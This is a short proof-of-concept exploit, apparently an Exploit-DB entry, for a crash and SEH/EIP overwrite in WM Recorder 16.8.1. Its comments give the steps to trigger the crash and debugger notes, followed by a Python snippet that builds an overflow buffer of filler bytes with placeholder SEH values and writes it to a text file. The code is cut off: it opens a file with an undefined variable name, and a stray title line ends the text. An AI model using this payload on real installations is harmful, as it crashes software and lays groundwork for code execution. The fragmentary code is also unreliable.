# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
junk = "\x41"*429
nseh = "\x42"*4
seh = "\x43"*4
fill = "\x44"*9562
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
WM Recorder 16.8.1 - Denial of Service